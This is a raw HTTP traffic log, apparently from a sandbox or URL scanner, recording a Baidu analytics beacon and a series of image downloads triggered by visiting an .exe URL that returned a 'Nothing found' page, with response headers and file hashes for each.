Date: Fri, 07 Jun 2019 14:07:41 GMT
Etag: "867751605"
Expires: Fri, 07 Jun 2019 14:37:41 GMT
Last-Modified: Fri, 05 Jun 2015 08:50:12 GMT
Server: BWS/1.0
Vary: Accept-Encoding


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   2404
Md5:    8d97ba4654dcd20da83631b6f298e30a
Sha1:   4ef15efe157573e2d46ec6eacf7e41160b01a4fa
Sha256: 6a43a65e541c0f46d9c542ca83bc4585998c58c0f902b872955852d943279f32
                                        
                                            GET /hm.gif?cc=1&ck=1&cl=24-bit&ds=1176x885&vl=754&et=0&fl=10.0&ja=1&ln=en-us&lo=0&rnd=1075923486&si=d08ccb4fc69a8cc8f34331c26e3fbe5d&v=1.2.51&lv=1&sn=52391&ct=!!&tt=Nothing%20found%20for%203Eebaa_426_111%20Exe HTTP/1.1 
Host: hm.baidu.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe
Cookie: HMACCOUNT=7F8C97504DB6FCDB

                                         
                                         103.235.46.191
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Cache-Control: private, max-age=0, no-cache
Content-Length: 43
Date: Fri, 07 Jun 2019 14:07:40 GMT
Pragma: no-cache
Server: apache
X-Content-Type-Options: nosniff


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1
Size:   43
Md5:    ad4b0f606e0f8465bc4c4c170b37e1a3
Sha1:   50b30fd5f87c85fe5cba2635cb83316ca71250d7
Sha256: cf4724b2f736ed1a0ae6bc28f1ead963d9cd2c1fd87b6ef32e7799fc1c5c8bda
                                        
                                            GET /uploads/922a530e2dda188777266c2b698189ea.gif HTTP/1.1 
Host: img.jsyihaotong.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
                                         61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: Tengine
Content-Length: 159292
Connection: keep-alive
Date: Fri, 07 Jun 2019 12:53:40 GMT
x-oss-request-id: 5CFA5E54B533D7319F05BE6E
Accept-Ranges: bytes
Etag: "5BB57E827606A111F57B86003FA40DF6"
Last-Modified: Thu, 11 Apr 2019 02:56:36 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 6788079892645652650
x-oss-storage-class: Standard
Content-MD5: W7V+gnYGoRH1e4YAP6QN9g==
x-oss-server-time: 32
Via: cache34.l2cn1823[0,304-0,H], cache48.l2cn1823[1,0], kunlun8.cn556[0,200-0,H], kunlun7.cn556[0,0]
Ali-Swift-Global-Savetime: 1554952032
Age: 4440
X-Cache: HIT TCP_MEM_HIT dirn:11:819894975
X-Swift-SaveTime: Fri, 07 Jun 2019 13:31:59 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72515599164608894515e


--- Additional Info ---
Magic:  GIF image data, version 89a, 1000 x 200
Size:   159292
Md5:    5bb57e827606a111f57b86003fa40df6
Sha1:   33f49a788217a8138525b95b4d83b3cb5de2fc8d
Sha256: 48388ae2c22bdabca2552d177c1269b55c318009359e5b77d3549c20210a83cf
                                        
                                            GET /uploads/c92f0e78cf65984c430d21db7ada9ea3.gif HTTP/1.1 
Host: img.jsyihaotong.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
                                         61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: Tengine
Content-Length: 84432
Connection: keep-alive
Date: Fri, 07 Jun 2019 12:58:49 GMT
x-oss-request-id: 5CFA5F8927D527C71020C5B7
Accept-Ranges: bytes
Etag: "F60E52186ED6B867B318CAC66C170A21"
Last-Modified: Thu, 06 Sep 2018 09:05:53 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 8193402748204353626
x-oss-storage-class: Standard
Content-MD5: 9g5SGG7WuGezGMrGbBcKIQ==
x-oss-server-time: 30
Via: cache50.l2cn1823[0,304-0,H], cache14.l2cn1823[1,0], kunlun5.cn556[0,200-0,H], kunlun7.cn556[1,0]
Age: 4132
Ali-Swift-Global-Savetime: 1541123948
X-Cache: HIT TCP_MEM_HIT dirn:0:25894243
X-Swift-SaveTime: Fri, 07 Jun 2019 13:29:49 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72515599164619054916e


--- Additional Info ---
Magic:  GIF image data, version 89a, 760 x 166
Size:   84432
Md5:    f60e52186ed6b867b318cac66c170a21
Sha1:   7f2e0a7609b583c23c8ff7b81ebf0308132b0c50
Sha256: e94acfd242ede7f1917e1a814ed687419303f8fb00969fbfd6e6143acb8c42cb
                                        
                                            GET /uploads/879e3b7573b0f1b643114de0f3630b4f.gif HTTP/1.1 
Host: img.jsyihaotong.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
                                         61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: Tengine
Content-Length: 141176
Connection: keep-alive
Date: Fri, 07 Jun 2019 12:58:49 GMT
x-oss-request-id: 5CFA5F89E6F906AA8EECDE18
Accept-Ranges: bytes
Etag: "D83E4536B5B37C91150BF3E14A1AC757"
Last-Modified: Fri, 07 Sep 2018 06:20:05 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 2922633104644263754
x-oss-storage-class: Standard
Content-MD5: 2D5FNrWzfJEVC/PhShrHVw==
x-oss-server-time: 47
Via: cache39.l2cn1823[0,304-0,H], cache9.l2cn1823[1,0], kunlun3.cn556[0,200-0,H], kunlun7.cn556[6,0]
Age: 4133
Ali-Swift-Global-Savetime: 1541123948
X-Cache: HIT TCP_MEM_HIT dirn:11:543373221
X-Swift-SaveTime: Fri, 07 Jun 2019 13:42:11 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72515599164624265069e


--- Additional Info ---
Magic:  GIF image data, version 89a, 980 x 60
Size:   141176
Md5:    d83e4536b5b37c91150bf3e14a1ac757
Sha1:   c47b75a90b97ef771b333db7517abac4d1dcf5db
Sha256: 88f17e10d6bd58de6fcd9e16425abfe198bb38bfc9a9e3749caa05d82f9d8c70
                                        
                                            GET /uploads/f560136e2c2ab5bf1371b2ad91dba9fa.gif HTTP/1.1 
Host: img.jsyihaotong.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
                                         61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: Tengine
Content-Length: 25264
Connection: keep-alive
Date: Fri, 07 Jun 2019 13:42:11 GMT
x-oss-request-id: 5CFA69B3737FAA3D993680FB
Accept-Ranges: bytes
Etag: "6CDE7E19253B8C7033138EE508E16545"
Last-Modified: Fri, 07 Sep 2018 06:26:21 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 2963734069645620425
x-oss-storage-class: Standard
Content-MD5: bN5+GSU7jHAzE47lCOFlRQ==
x-oss-server-time: 3
Via: cache10.l2cm10-1[22,304-0,H], cache35.l2cm10-1[23,0], kunlun1.cn556[0,200-0,H], kunlun7.cn556[1,0]
Age: 1532
Ali-Swift-Global-Savetime: 1541105593
X-Cache: HIT TCP_MEM_HIT dirn:9:669261338
X-Swift-SaveTime: Fri, 07 Jun 2019 13:42:11 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72515599164631895306e


--- Additional Info ---
Magic:  GIF image data, version 89a, 240 x 540
Size:   25264
Md5:    6cde7e19253b8c7033138ee508e16545
Sha1:   dd642058e25b1d35935be01251fc6407c4630468
Sha256: cbadf45d19c24b4b525845bae70bd14c2c6175ac5ab89c54793f74e1b94587fb
                                        
                                            GET /uploads/831fcad2aa4b23abb8379c39d7a2444e.gif HTTP/1.1 
Host: img.jsyihaotong.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
                                         61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: Tengine
Content-Length: 7467
Connection: keep-alive
Date: Fri, 07 Jun 2019 13:10:50 GMT
x-oss-request-id: 5CFA625ABE768F465A0A9C4F
Accept-Ranges: bytes
Etag: "7951560C14F06D5FC17209083C1D4549"
Last-Modified: Fri, 07 Sep 2018 06:25:21 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 2709484068056267556
x-oss-storage-class: Standard
Content-MD5: eVFWDBTwbV/BcgkIPB1FSQ==
x-oss-server-time: 6
Via: cache10.l2et2-1[0,304-0,H], cache15.l2et2-1[1,0], kunlun4.cn556[0,200-0,H], kunlun7.cn556[2,0]
Age: 3413
Ali-Swift-Global-Savetime: 1541079148
X-Cache: HIT TCP_MEM_HIT dirn:11:731897020
X-Swift-SaveTime: Fri, 07 Jun 2019 14:01:16 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72515599164634505385e


--- Additional Info ---
Magic:  GIF image data, version 89a, 39 x 268
Size:   7467
Md5:    7951560c14f06d5fc17209083c1d4549
Sha1:   779ca9043a658d07e990b9b06dbe895ca356621f
Sha256: 7b71d580d662edcbce14d09e051c9cdd6e44c5a76908bcc1763ad1c4e4497d1b
                                        
                                            GET /uploads/f37d901910f19b0af5166732057cb55a.gif HTTP/1.1 
Host: img.jsyihaotong.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
                                         61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: Tengine
Content-Length: 3181
Connection: keep-alive
Date: Fri, 07 Jun 2019 12:27:15 GMT
x-oss-request-id: 5CFA5823B007B7650739BB88
Accept-Ranges: bytes
Etag: "ACD657D8DF9241A153133CDBC926F4B0"
Last-Modified: Fri, 07 Sep 2018 03:03:24 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 4294663466348140134
x-oss-storage-class: Standard
Content-MD5: rNZX2N+SQaFTEzzbySb0sA==
x-oss-server-time: 29
Via: cache47.l2cn1823[0,304-0,H], cache19.l2cn1823[1,0], kunlun2.cn556[0,200-0,H], kunlun7.cn556[1,0]
Age: 6028
Ali-Swift-Global-Savetime: 1545059232
X-Cache: HIT TCP_MEM_HIT dirn:10:425034411
X-Swift-SaveTime: Fri, 07 Jun 2019 13:18:44 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72515599164636995492e


--- Additional Info ---
Magic:  GIF image data, version 89a, 1000 x 50
Size:   3181
Md5:    acd657d8df9241a153133cdbc926f4b0
Sha1:   3510be93a9e851aa533ad47cc70e6ec91c5c8be0
Sha256: fcb2f2759f42d40e5176e005f15482e629e97a1ef6117e2bf25959440e3f7b3f
                                        
                                            GET /uploads/3d414ea885893bf375a872f619974e59.gif HTTP/1.1 
Host: img.jsyihaotong.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
                                         61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: Tengine
Content-Length: 7291
Connection: keep-alive
Date: Fri, 07 Jun 2019 12:25:19 GMT
x-oss-request-id: 5CFA57AF3DD124047C7CCEE2
Accept-Ranges: bytes
Etag: "F1BDB76A9D3BD20B968BD8E95CE2CD52"
Last-Modified: Fri, 07 Sep 2018 03:06:23 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 9850675076093785494
x-oss-storage-class: Standard
Content-MD5: 8b23ap070guWi9jpXOLNUg==
x-oss-server-time: 2
Via: cache6.l2cn1819[0,304-0,H], cache19.l2cn1819[0,0], kunlun8.cn556[0,200-0,H], kunlun7.cn556[8,0]
Age: 6144
Ali-Swift-Global-Savetime: 1541064177
X-Cache: HIT TCP_MEM_HIT dirn:0:581796476
X-Swift-SaveTime: Fri, 07 Jun 2019 13:19:53 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72515599164639525605e


--- Additional Info ---
Magic:  GIF image data, version 89a, 333 x 81
Size:   7291
Md5:    f1bdb76a9d3bd20b968bd8e95ce2cd52
Sha1:   820240b32d30412dd85fe831ada1495d1a71d3cb
Sha256: 1709f2b77f7fc04ed2bef51f00860c2d504727e15dbcb0aa2eafae2e027f4aea
                                        
                                            GET /uploads/b607f5c525da30c92fe28fb9b5a75494.gif HTTP/1.1 
Host: img.jsyihaotong.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
                                         61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: Tengine
Content-Length: 6835
Connection: keep-alive
Date: Fri, 07 Jun 2019 12:54:26 GMT
x-oss-request-id: 5CFA5E82F746B8FA6202EE50
Accept-Ranges: bytes
Etag: "EFC3D4F0D0C2D35C69557E477B2E4FC6"
Last-Modified: Fri, 07 Sep 2018 12:31:28 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 8126930978737904887
x-oss-storage-class: Standard
Content-MD5: 78PU8NDC01xpVX5Hey5Pxg==
x-oss-server-time: 15
Via: cache29.l2cn1823[0,304-0,H], cache30.l2cn1823[1,0], kunlun10.cn556[0,200-0,H], kunlun7.cn556[8,0]
Age: 4398
Ali-Swift-Global-Savetime: 1545059233
X-Cache: HIT TCP_MEM_HIT dirn:9:610914861
X-Swift-SaveTime: Fri, 07 Jun 2019 13:18:42 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72515599164642145703e


--- Additional Info ---
Magic:  GIF image data, version 89a, 333 x 81
Size:   6835
Md5:    efc3d4f0d0c2d35c69557e477b2e4fc6
Sha1:   2e00fe60321983aa9793dfbb747037ac625e15eb
Sha256: c2ef12c881a522f618cb850034fc17c2f4509ffe6a379247710777f2ada5d47d
                                        
                                            GET /uploads/b76d637215dbe1935631deb860e9adcd.gif HTTP/1.1 
Host: img.jsyihaotong.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
                                         61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: Tengine
Content-Length: 6529
Connection: keep-alive
Date: Fri, 07 Jun 2019 13:52:24 GMT
x-oss-request-id: 5CFA6C183CCD2680572F84A8
Accept-Ranges: bytes
Etag: "4446BE8C5F8FE54AE0541FE8C9B5060A"
Last-Modified: Fri, 07 Sep 2018 03:06:23 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 11507538434270433860
x-oss-storage-class: Standard
Content-MD5: REa+jF+P5UrgVB/oybUGCg==
x-oss-server-time: 7
Via: cache41.l2cn1823[29,304-0,H], cache43.l2cn1823[30,0], kunlun7.cn556[0,200-0,H], kunlun7.cn556[0,0]
Age: 920
Ali-Swift-Global-Savetime: 1541071892
X-Cache: HIT TCP_MEM_HIT dirn:9:451801679
X-Swift-SaveTime: Fri, 07 Jun 2019 13:52:24 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72515599164644735863e


--- Additional Info ---
Magic:  GIF image data, version 89a, 333 x 81
Size:   6529
Md5:    4446be8c5f8fe54ae0541fe8c9b5060a
Sha1:   eb4e187594203173fc7a4ed8281f228faac5b113
Sha256: d27415d507a4a1f0ef0f64df59792c37074c57c1478af438ecc68566b0c222d2
                                        
                                            GET /uploads/4320e07e2fb45bb0318256d3bbaf05ed.gif HTTP/1.1 
Host: img.jsyihaotong.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
                                         61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: Tengine
Content-Length: 345954
Connection: keep-alive
Date: Fri, 07 Jun 2019 12:33:14 GMT
x-oss-request-id: 5CFA598A94D2DC78C5EE7F6E
Accept-Ranges: bytes
Etag: "354384A4EF3BF6CE2F5F94C1096DEB9D"
Last-Modified: Mon, 01 Apr 2019 06:15:45 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 11885866581657763957
x-oss-storage-class: Standard
Content-MD5: NUOEpO879s4vX5TBCW3rnQ==
x-oss-server-time: 61
Via: cache30.l2et2-1[0,304-0,H], cache10.l2et2-1[1,0], kunlun5.cn556[0,200-0,H], kunlun8.cn556[1,0]
Ali-Swift-Global-Savetime: 1554719069
Age: 5669
X-Cache: HIT TCP_MEM_HIT dirn:10:680937807
X-Swift-SaveTime: Fri, 07 Jun 2019 13:28:15 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72615599164630814146e


--- Additional Info ---
Magic:  GIF image data, version 89a, 1000 x 200
Size:   345954
Md5:    354384a4ef3bf6ce2f5f94c1096deb9d
Sha1:   4d08425d4e9d5c11bcc6ea457970458b85dd4366
Sha256: 01224f7fbe46e62152f2b8bc9c11935c17fcd2f41a8ac2ed36ebe6150ec720cd
                                        
                                            GET /uploads/8c3615e38c44d19f3156fd7dadf5edca.gif HTTP/1.1 
Host: img.jsyihaotong.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
                                         61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: Tengine
Content-Length: 157474
Connection: keep-alive
Date: Fri, 07 Jun 2019 12:54:18 GMT
x-oss-request-id: 5CFA5E7AB1F7903EF03AC1FE
Accept-Ranges: bytes
Etag: "B90017BB17B86469793C05065C2D6D4E"
Last-Modified: Thu, 11 Apr 2019 02:22:34 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 15527053532564001875
x-oss-storage-class: Standard
Content-MD5: uQAXuxe4ZGl5PAUGXC1tTg==
x-oss-server-time: 40
Via: cache43.l2cn1823[0,304-0,H], cache22.l2cn1823[1,0], kunlun10.cn556[0,200-0,H], kunlun6.cn556[1,0]
Ali-Swift-Global-Savetime: 1554949894
Age: 4403
X-Cache: HIT TCP_MEM_HIT dirn:0:123837880
X-Swift-SaveTime: Fri, 07 Jun 2019 13:31:59 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72415599164610835946e


--- Additional Info ---
Magic:  GIF image data, version 89a, 1000 x 200
Size:   157474
Md5:    b90017bb17b86469793c05065c2d6d4e
Sha1:   31a99a9be4fa4f538e26ef76b50806792c814f52
Sha256: 452408ec45f4c7ae53591c6026c3a01b2960ad2476f7df0d4676f8f2a03a689f
                                        
                                            GET /uploads/e3be46ea3f70d518d5d655316989ccf6.gif HTTP/1.1 
Host: img.jsyihaotong.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
                                         61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: Tengine
Content-Length: 7432
Connection: keep-alive
Date: Fri, 07 Jun 2019 12:55:19 GMT
x-oss-request-id: 5CFA5EB7BE0EBC296F486690
Accept-Ranges: bytes
Etag: "AE4822DAAD08B086FBA0B1753FE5C943"
Last-Modified: Thu, 06 Sep 2018 09:13:40 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 14407415823828087238
x-oss-storage-class: Standard
Content-MD5: rkgi2q0IsIb7oLF1P+XJQw==
x-oss-server-time: 17
Via: cache22.l2cn1819[0,304-0,H], cache50.l2cn1819[0,0], kunlun1.cn556[0,200-0,H], kunlun8.cn556[1,0]
Age: 4345
Ali-Swift-Global-Savetime: 1545059233
X-Cache: HIT TCP_MEM_HIT dirn:11:744234486
X-Swift-SaveTime: Fri, 07 Jun 2019 13:20:51 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72615599164648864759e


--- Additional Info ---
Magic:  GIF image data, version 89a, 333 x 79
Size:   7432
Md5:    ae4822daad08b086fba0b1753fe5c943
Sha1:   5840f314811733d0aa0d5a8324d2b81f419930a4
Sha256: a1a73f2f4d7ef275ee8e593c593b33f8f0872d034144f987f17f36f3894785c0
                                        
                                            GET /uploads/d513716df9ee9c021a0a398c231f2dfc.jpg HTTP/1.1 
Host: img.jsyihaotong.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
                                         61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Server: Tengine
Content-Length: 23702
Connection: keep-alive
Date: Fri, 07 Jun 2019 13:31:59 GMT
x-oss-request-id: 5CFA674F3861C53FA1F7F6D3
Accept-Ranges: bytes
Etag: "82872F953D4854208F90CAF10A86CAEB"
Last-Modified: Fri, 07 Sep 2018 03:08:21 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 14478386051354111384
x-oss-storage-class: Standard
Content-MD5: gocvlT1IVCCPkMrxCobK6w==
x-oss-server-time: 50
Via: cache12.l2et2-1[26,304-0,H], cache14.l2et2-1[28,0], kunlun5.cn556[0,200-0,H], kunlun6.cn556[1,0]
Age: 2146
Ali-Swift-Global-Savetime: 1541064176
X-Cache: HIT TCP_MEM_HIT dirn:11:708239140
X-Swift-SaveTime: Fri, 07 Jun 2019 13:31:59 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72415599164650977446e


--- Additional Info ---
Magic:  JPEG image data, EXIF standard
Size:   23702
Md5:    82872f953d4854208f90caf10a86caeb
Sha1:   642da262ac9d0448720e3356fbc777d5ecd7f273
Sha256: d23c473345e74300c03c15f53c391a5f092c502934a0b962561699f159cdb443
                                        
                                            GET /uploads/bd448c08ef8544f717e6375cf153c361.gif HTTP/1.1 
Host: img.jsyihaotong.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
                                         61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: Tengine
Content-Length: 7081
Connection: keep-alive
Date: Fri, 07 Jun 2019 13:18:42 GMT
x-oss-request-id: 5CFA64325D25B1E78BF0C5CD
Accept-Ranges: bytes
Etag: "B50A517009A7069DF753010A8E370DF0"
Last-Modified: Sat, 10 Nov 2018 01:50:53 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 1385452570929880889
x-oss-storage-class: Standard
Content-MD5: tQpRcAmnBp33UwEKjjcN8A==
x-oss-server-time: 2
Via: cache18.l2cm10-1[23,304-0,H], cache32.l2cm10-1[24,0], kunlun2.cn556[0,200-0,H], kunlun6.cn556[1,0]
Age: 2943
Ali-Swift-Global-Savetime: 1545059233
X-Cache: HIT TCP_MEM_HIT dirn:0:162534474
X-Swift-SaveTime: Fri, 07 Jun 2019 13:18:42 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72415599164656227649e


--- Additional Info ---
Magic:  GIF image data, version 89a, 334 x 81
Size:   7081
Md5:    b50a517009a7069df753010a8e370df0
Sha1:   d8bcc95f60cf23660e7b9262f7a15c461e8f21f4
Sha256: b63e9d54f8a411cce04a6eec650f153d569954f72fd816e421436656e3b16dfc
                                        
                                            GET /uploads/fd9a878938755a852faa2dfec51a63b3.jpg HTTP/1.1 
Host: img.jsyihaotong.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
                                         61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Server: Tengine
Content-Length: 14242
Connection: keep-alive
Date: Fri, 07 Jun 2019 12:27:15 GMT
x-oss-request-id: 5CFA5823F746B8FA62D9CDC2
Accept-Ranges: bytes
Etag: "73C2658BD87F442DBE3688A4FE48352C"
Last-Modified: Fri, 07 Sep 2018 03:08:21 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 10315735259197256842
x-oss-storage-class: Standard
Content-MD5: c8Jli9h/RC2+Noik/kg1LA==
x-oss-server-time: 21
Via: cache16.l2cn1823[0,304-0,H], cache13.l2cn1823[1,0], kunlun9.cn556[0,200-0,H], kunlun7.cn556[0,0]
Age: 6030
Ali-Swift-Global-Savetime: 1541064178
X-Cache: HIT TCP_MEM_HIT dirn:10:251011529
X-Swift-SaveTime: Fri, 07 Jun 2019 13:19:53 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72515599164656786351e


--- Additional Info ---
